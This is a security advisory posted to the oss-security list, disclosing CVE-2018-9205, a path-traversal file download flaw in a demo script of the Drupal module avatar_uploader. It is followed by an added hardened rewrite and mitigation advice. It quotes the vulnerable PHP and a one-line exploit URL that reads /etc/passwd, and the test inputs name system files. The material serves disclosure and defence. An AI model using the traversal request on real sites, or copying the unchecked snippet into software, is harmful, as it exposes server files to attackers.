Message-id: <3B4F690F-2918-4282-BEBE-E163F07D205F@me.com>
Date: Thu, 12 Apr 2018 08:28:15 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8

Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
Date: 2018-03-30
CVE-ID: [CVE-2018-9205]
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-04-02
Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
Advisory: http://www.vapidlabs.com/advisory.php?v=202

Description:
This module uses Simple Ajax Uploader and provides a basic uploader panel; for more effect, you can add your own custom JavaScript, such as sliding up the edit link when the user's mouse hovers on the avatar, or others.

Vulnerability:
The demo script view.php (shipped under lib/demo/) reads a file named by the request and echoes it back. It performs no access check to verify that the requesting user should be able to view files at all, and nothing prevents the caller from using "../" components to change the path to a location outside the uploadDir directory, so any file readable by the web server process can be downloaded without authentication:

<?php
$file = $_GET['file'];
echo file_get_contents("uploadDir/$file");
exit;

Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
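For comparison, the following is a hardened replacement for the demo script. It is an added example written for this page, not code from the avatar_uploader module or from the advisory's author. The names UPLOAD_DIR and user_may_view_avatar() are assumptions: the module would have to wire the authorisation hook to its real access check (under Drupal 7, for instance, user_access() after a bootstrap). Beyond the single case on the page it also rejects NUL bytes, backslashes and symlinks planted inside the upload directory, and it serves only files that decode as images.

```php
<?php
/*
 * Added example, not the module's code: a hardened view.php.
 * Assumed names: UPLOAD_DIR (upload directory) and
 * user_may_view_avatar() (authorisation hook to be supplied by the module).
 */

define('UPLOAD_DIR', __DIR__ . '/uploadDir');

/* Assumed authorisation hook; the original demo performs no check at all.
 * Deny by default so that forgetting to wire it fails closed. */
function user_may_view_avatar($name)
{
    return false;
}

/* Accept only a plain file name: letters, digits, underscore, dash and an
 * optional extension. This rejects "/", "\", NUL bytes and "..", whatever
 * URL encoding they arrived in, since PHP has already decoded $_GET. */
function is_safe_name($name)
{
    return is_string($name)
        && preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?\z/', $name) === 1;
}

/* Map an untrusted name to a regular file directly inside UPLOAD_DIR,
 * or return null. realpath() is a second, independent barrier: it resolves
 * symlinks, so a link dropped into uploadDir cannot point outside it. */
function resolve_upload($name)
{
    if (!is_safe_name($name)) {
        return null;
    }
    $base = realpath(UPLOAD_DIR);
    $path = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

/* Serve the file with an explicit content type instead of echoing
 * file_get_contents(). Returns true if a file was sent. */
function serve_upload($name)
{
    if (!user_may_view_avatar($name)) {
        http_response_code(403);
        return false;
    }
    $path = resolve_upload($name);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    // Avatars are images; refuse anything that does not decode as one.
    $info = @getimagesize($path);
    if ($info === false) {
        http_response_code(404);
        return false;
    }
    header('Content-Type: ' . $info['mime']);
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
    return true;
}

if (PHP_SAPI === 'cli') {
    // Offline check of the name filter alone (constructed inputs, no files needed):
    $samples = ['avatar.png', '../../../../etc/passwd', "a\0.png", 'x/y.png', '..\\..\\boot.ini'];
    foreach ($samples as $n) {
        printf("%-28s %s\n", addcslashes($n, "\0"), is_safe_name($n) ? 'accepted' : 'rejected');
    }
} else {
    serve_upload(isset($_GET['file']) ? $_GET['file'] : '');
}
```

Run from the command line (`php view.php`) the script only exercises the name filter; only `avatar.png` is accepted. Note that the vulnerable file is a demo that ships inside the module directory, so on a deployed site the simplest mitigation is to remove lib/demo/ (or deny web access to it in the web server configuration) rather than to harden a script that production pages never use.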